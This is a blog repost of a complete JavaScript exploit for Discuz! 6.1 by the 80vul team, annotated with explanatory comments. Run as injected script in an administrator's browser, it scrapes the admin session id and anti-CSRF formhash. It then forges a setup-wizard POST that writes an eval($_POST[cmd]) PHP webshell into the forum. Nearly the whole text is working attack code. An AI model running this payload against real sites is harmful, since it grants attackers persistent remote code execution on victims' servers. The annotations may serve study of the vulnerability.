Discuz! 6.1 xss2webshell Exploit

    [多云 November 27, 2008 11:39 | by !4p47hy ]
Discuz! 6.1 xss2webshell Exploit
/*
#############################################
Discuz! 6.1 xss2webshell[SODB-2008-10]  Exploit
by 80vul-A
team: http://www.80vul.com
#############################################
*/
// Target forum base URL. Every request below appends a path to this string
// directly, so the trailing slash is required.
var siteurl='http://www.80vul.com/Discuz_6.1.0/';

// Build a synchronous XHR object. This script is written to run as injected
// JavaScript inside a logged-in administrator's browser (an XSS payload): the
// requests are same-origin with the forum and carry the victim's cookies.
var request = false;
        if(window.XMLHttpRequest) {
            request = new XMLHttpRequest();
            if(request.overrideMimeType) {
                request.overrideMimeType('text/xml');
            }
        } else if(window.ActiveXObject) {
            // Legacy IE fallback. There is no `break` in the loop: every ProgID is
            // tried and the LAST one that constructs successfully wins, not the
            // first. 'Microsoft.XMLHTTP' is listed twice.
            var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
            for(var i=0; i<versions.length; i++) {
                try {
                    request = new ActiveXObject(versions[i]);
                } catch(e) {}
            }
        }
// Implicit global (no `var`). If neither branch produced an object, `request`
// is still `false` and the first .open() below throws a TypeError.
xmlhttp=request;

// Step 1: recover the admin session id (sid).
// The admin frameset embeds the sid in its "action=home&sid=..." link; a
// synchronous GET plus a regex over the response text pulls it out.
xmlhttp.open("GET", siteurl+"admincp.php?frames=yes", false);
// Firefox 3 does not accept a bare xmlhttp.send(); pass null explicitly.
// See http://hi.baidu.com/aullik5/blog/item/fd0648fa4ef44762034f564e.html
// thx luoluo@ph4nt0m.org
xmlhttp.send(null);
var echo = xmlhttp.responseText;
var reg = /action=home&sid=([\w\d]+)\" /i;
var arr=reg.exec(echo);
if(!arr){
// The victim is not logged in to the admin panel (no sid link in the page).
// Execution does not stop here: `sid` stays undefined, the next GET is sent
// with a literal "undefined" sid, and the script aborts at `arr[1]` below.
//alert(document.cookie);
}else{
var sid=arr[1];
}

// Step 2: recover the anti-CSRF token (formhash) from the admin home page.
// Because this code runs same-origin in the victim's browser, the token is
// readable via XHR, so a CSRF token alone does not stop an XSS-driven forged
// request — the chain is only broken by fixing the XSS or by an extra factor
// the page does not show (e.g. re-authentication for the wizard).
xmlhttp.open("GET", siteurl+"admincp.php?action=home&sid="+sid, false);
xmlhttp.send(null);
var echo = xmlhttp.responseText;
var reg = / name=\"formhash\" value=\"([\w\d]+)\"/i;
var arr=reg.exec(echo);
// Installed immediately before `arr[1]` is dereferenced: if the regex did not
// match, the TypeError still aborts the script, but returning true suppresses
// the browser's error reporting — presumably to keep the failure invisible to
// the victim. This is not error handling.
window.onerror=function(){return true;}
var formhash=arr[1];
//alert(formhash);

// Step 3: write the webshell via SODB-2008-10.
// Advisory: http://www.80vul.com/dzvul/sodb/10/sodb-2008-10.txt
// Forged POST to the admin "setup wizard" (runwizard, step 3) with
// settingsnew[bbname] set to PHP code. The whole body is passed through
// unescape() before sending, so the percent-escapes exist only in this
// listing; the wire body is the decoded text, i.e.
//   settingsnew[bbname]=<?@eval($_POST[cmd]):?>   (eval backdoor, command in POST `cmd`)
//   settingsnew[sitename]=Comsenz Inc.  settingsnew[siteurl]=http://www.comsenz.com/
//   step2submit=<GBK-encoded button label, presumably "下一步"/Next>  formhash=<stolen token>
// Per the linked advisory the wizard persists these settings into a PHP
// source file without filtering, which is what turns the XSS into remote
// code execution — confirm against the advisory; this script only shows the
// request, not the server-side write.
// NOTE(review): Referer is a forbidden request header for XHR; modern
// browsers silently ignore this setRequestHeader call. Whether the 2008-era
// clients this targeted honoured it cannot be told from here.
xmlhttp.open("POST", siteurl+"admincp.php?action=runwizard&step=3", false);
xmlhttp.setRequestHeader("Referer", siteurl);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlhttp.send(unescape("settingsnew%5Bbbname%5D=%3C%3F@eval($_POST[cmd])%3A%3F%3E&settingsnew%5Bsitename%5D=Comsenz+Inc.&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=+%CF%C2%D2%BB%B2%BD+&formhash="+formhash));